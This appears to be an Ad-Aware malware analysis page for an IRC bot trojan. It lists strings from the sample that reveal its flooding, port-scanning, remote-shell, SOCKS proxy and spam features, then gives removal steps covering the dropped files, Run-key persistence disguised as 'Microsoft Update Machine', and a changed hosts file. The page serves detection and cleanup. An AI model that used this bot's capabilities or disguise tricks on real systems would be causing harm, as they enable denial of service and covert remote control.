[SCAN]: Failed to start scan thread, error: <%d>.
c_privmsg
[%s] <%s> %s
[%s] * %s %s
[SCAN]: Already %d scanning threads. Too many specified.
[SCAN]: Failed to start scan, port is invalid.
[SCAN]: %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
udpflood
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
[UDP]: Failed to start flood thread, error: <%d>.
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[PING]: Failed to start flood thread, error: <%d>.
ICMP.dll not available
tcpflood
[TCP]: %s %s flooding: (%s:%s) for %s seconds.
[TCP]: Failed to start flood thread, error: <%d>.
[TCP]: Invalid flood time must be greater than 0.
[TCP]: Invalid flood type specified.
helo $rndnick
mail from: <%s>
rcpt to: <%s>
subject: %s
from: %s
[EMAIL]: Message sent to %s.
httpcon
[FTP]: File not found: %s.
%s\%i%i%i.dll
open %s
put %s
-s:%s
PTF.exe
[FTP]: Uploading file: %s to: %s
[FTP]: Uploading file: %s to: %s failed.
[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.
[REDIRECT]: Failed to start client thread, error: <%d>.
[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.
[REDIRECT]: Failed to start connection thread, error: <%d>.
PRIVMSG %s :%s
[CMD]: Could not read data from proccess
[CMD]: Proccess has terminated.
[CMD]: Could not read data from proccess.
cmd.exe
[CMD]: Remote Command Prompt
[CMD]: Failed to start IO thread, error: <%d>.
[RLOGIND]: Error: getpeername(): <%d>.
[RLOGIND]: User logged in: <%s@%s>.
[RLOGIND]: Error: SessionRun(): <%d>.
[RLOGIND]: User logged out: <%s@%s>.
[RLOGIND]: Protocol string too long.
[RLOGIND]: Login rejected, Remote user: <%s@%s>.
[RLOGIND]: Error: WSAStartup(): <%d>.
[RLOGIND]: Failed to install control-C handler, error: <%d>.
[RLOGIND]: Ready and waiting for incoming connections.
[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.
[RLOGIND]: Failed to start client thread, error: <%d>.
[RLOGIND]: Error: server failed, returned: <%d>.
[%s]|
[%d]%s
[SCAN]: IP: %s Port: %d is open.
[SCAN]: Scanning IP: %s, Port: %d.
[SECURE]: Failed to open DCOM registry key.
[SECURE]: Failed to open IPC$ Restriction registry key.
[SECURE]: Advapi32.dll couldn't be loaded.
[SECURE]: Share '%S' deleted.
[SECURE]: Failed to delete '%S' share.
[SECURE]: Share '%s' deleted.
[SECURE]: Failed to delete '%s' share.
[SECURE]: Netapi32.dll couldn't be loaded.
[SECURE]: Failed to open IPC$ restriction registry key.
[SECURE]: Share '%s' added.
[SECURE]: Failed to add '%s' share.
[RLOGIND]: Failed to create ReadShell session thread, error: <%d>.
[RLOGIND]: WaitForMultipleObjects error: <%d>.
[RLOGIND]: Failed to create shell stdout pipe, error: <%d>.
[RLOGIND]: Failed to create shell stdin pipe, error: <%d>.
[RLOGIND]: Failed to execute shell.
cmd /q
[RLOGIND]: Failed to execute shell, error: <%d>.
[RLOGIND]: SessionReadShellThread exited, error: <%ld>.
tPTF.exe -i get
[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.
[SOCKS4]: Failed to start client thread, error: <%d>.
[SOCKS4]: Failed to start server on Port %d.
[SOCKS4]: Authentication failed. Remote userid: %s != %s.
[SOCKS4]: Error: Failed to open socket(), returned: <%d>.
[SOCKS4]: Error: Failed to connect to target, returned: <%d>.
[SYN]: Send error: <%d>.
Ý %dh %dm
%s (%s)
[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]: %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]: %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]: %s. [Uptime]: %s.
[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.
[TCP]: Error: socket() failed, returned: <%d>.
[TCP]: Error: setsockopt() failed, returned: <%d>.
[TCP]: Invalid target IP.
[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[TFTP]: Error: socket() failed, returned: <%d>.
[TFTP]: Failed to open file: %s.
[TFTP]: File not found: %s (%s).
[TFTP]: File transfer started to IP: %s (%s).
[TFTP]: File transfer complete to IP: %s (%s).
%s: %s stopped. (%d thread(s) stopped.)
%s: No %s thread found.
[VISIT]: Invalid URL.
[VISIT]: Failed to connect to HTTP server.
[VISIT]: URL visited.
[VISIT]: Failed to get requested URL from HTTP server.
zcÁ
[10-10-2016 05:13:03] [IDENTD]: Server running on Port: 113.
%System%\eohpsgi.exe
TransactNamedPipe
GetProcessHeap
PeekNamedPipe
CreatePipe
GetCPInfo
KERNEL32.dll
0!1)1]1{1
3O4
: :4:::]:
11`1i1d2m2
: :4:?:[:
5054585<5@5
7.72767:7>7
8#8)81878]8
? ?$?8?<?
1 2(2,20242
\C$\123456111111111111111.doc
127.0.0.1\IPC$\
Windows 2000 2195
Windows 2000 5.0
\\192.168.1.210\IPC$
\PIPE\


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1756
    eohpsgi.exe:1660
    run.exe:1388
    Uncrypted.exe:224

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\LOIC.exe (133 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Uncrypted.exe (3878 bytes)
    %System%\drivers\etc\hosts (518 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDYZG96R\desktop.ini (67 bytes)
    %System%\eohpsgi.exe (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85IF8HAJ\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\7IQEU6O0\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LTNDDR8Y\desktop.ini (67 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Microsoft Update Machine" = "eohpsgi.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
    "Microsoft Update Machine" = "eohpsgi.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Microsoft Update Machine" = "eohpsgi.exe"

  5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
    127.0.0.1 localhost
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now